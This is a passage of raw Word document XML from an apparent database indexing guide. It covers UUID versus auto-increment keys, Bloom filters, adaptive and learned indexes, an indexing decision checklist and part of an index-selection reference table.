              <w:t>Aspect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2AE163" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Auto-Increment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1551C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UUID (random)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="13E89E7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61BE16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Insert pattern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C6326D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Append-only (fast)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8950AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Random position (page splits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="52956DA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15109A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Index size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2AD310" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>4–8 bytes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EFF4F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>16 bytes (2x–4x larger)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="7BA50CE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9BF21C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Cacheability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A40B96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Hot pages at the end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5D7D83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>ALL pages equally hot (poor locality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="6B7413D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EC5BE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Write throughput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8D5A25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>High (sequential)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C81900" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Lower (random I/O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="37D265A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2A7FE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Distribution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7924AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Monotonic (reveals ordering/count)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80A1F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Random (no information leakage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D92D193" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If you need UUIDs: use UUIDv7 (time-ordered)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — provides the randomness benefits with sequential-insert performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247EAB54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Bloom Filters as Index Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F6E76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by LSM-Tree databases (RocksDB, Cassandra, LevelDB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD8080" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Before reading an SSTable from disk to check if a key exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7B453" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Check the Bloom filter for that SSTable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD9784" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>If Bloom filter says "definitely not here" → skip the SSTable entirely (save a disk read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A61BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>If Bloom filter says "maybe here" → read the SSTable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4AF1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E8D07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without Bloom filter: Check 7 SSTables for a key → 7 disk reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F526CE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>With Bloom filter (1% FP rate): Check 7 Bloom filters → ~0.07 disk reads (6.93 skipped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE579E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Typical space:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> 10 bits per key → 1% false positive rate. For 1 billion keys: 1.2 GB of Bloom filter data (fits in RAM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D43DBD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Adaptive Indexing (Database Cracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751405F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Instead of creating indexes upfront, the database creates and refines indexes incrementally as queries arrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F45A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF8936" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>First query: WHERE price &gt; 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFF8DEC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Database partially sorts the data around the pivot 100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F45E26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Left partition: price ≤ 100. Right partition: price &gt; 100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC7FE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="62532E7C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Second query: WHERE price BETWEEN 50 AND 150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B3107" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Refines the partitioning further (splits at 50 and 150).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10049530" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1ADC1C65" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Over time: The index becomes progressively refined based on actual query patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A0CE3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> No upfront index creation decision. Index adapts to workload. No unused indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D0ACD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used in:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Research databases (MonetDB). Concepts influence adaptive features in commercial databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766425FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.4 Approximate Indexes (Learned Indexes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12AB6F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept (Google research, "The Case for Learned Index Structures"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647AEA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A B-Tree is essentially a function: f(key) → position. What if we replace the B-Tree with a machine learning model that approximates this function?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703CA61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777CE4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Traditional B-Tree: key → tree traversal → position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31F207" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Learned index: key → neural network/linear model → approximate position → local search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EEE21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Potential advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A23DEE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Smaller than B-Tree (model weights vs. full tree structure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EBA69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Faster (model inference vs. multiple pointer chases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB23E03" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Can exploit data distribution (if keys are uniformly distributed, a simple linear function works perfectly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01DA32" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Research and specialized use cases. Not in mainstream databases yet. Hybrid approaches (learned models + B-Tree fallback) show promise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C9996" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="2160E2A6">
          <v:rect id="_x0000_i5336" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CFF37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Indexing Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26178DDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 Should You Add an Index?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA298E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09175C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Is this query critical? (high frequency, high latency, user-facing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1F81E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   NO → probably don't index (let it full scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30286C9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   YES → continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBBB73" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1DB2DA49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Is the table large enough that a scan is expensive? (&gt; 10K rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716CDC23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   NO → scan is fine (small table fits in memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78461EB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   YES → continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514C020" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="781B5247" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Does the query filter on specific columns with high selectivity? (&lt; 10% of rows match)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B307902" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   NO → index may not help (scan may be chosen anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F2E73" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   YES → index will help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5BAC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="029A7B2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>4. Can the write overhead be tolerated? (table write frequency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74009A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   NO (extreme write volume) → consider alternatives (materialized view, read replica, search engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4807F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   YES → create the index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626553A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="644658B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>5. Can the index fit in memory? (RAM budget)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A59D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   NO → consider partial index, BRIN, or external search engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F6907" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   YES → create the index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D0817" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Summary — Index Selection Quick Reference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034"/>
        <w:gridCol w:w="5308"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="7F4B529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CC05F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Query Pattern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0DA3A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best Index Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="1F297F4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AC1FCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Exact match (WHERE x = ?)</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4C8223" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>B-Tree (default) or Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="1E7BD16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04F60E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Range (WHERE x &gt; ? AND x &lt; ?)</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602517" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>B-Tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5D19945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1E15EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Sorting (ORDER BY x)</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3BB19D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>B-Tree (matching sort direction)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="227DCBD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5C0826" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Multi-column equality + range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B16509" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Composite B-Tree (equality cols first, range last)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="03570E7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0181BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Pattern match (LIKE 'abc%')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DB4E49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>B-Tree (prefix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5FBDDCE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D23A01" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Pattern match (LIKE '%abc%')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08053D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GIN/Full-text or trigram (pg_trgm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="010C8C5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D1AC9F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
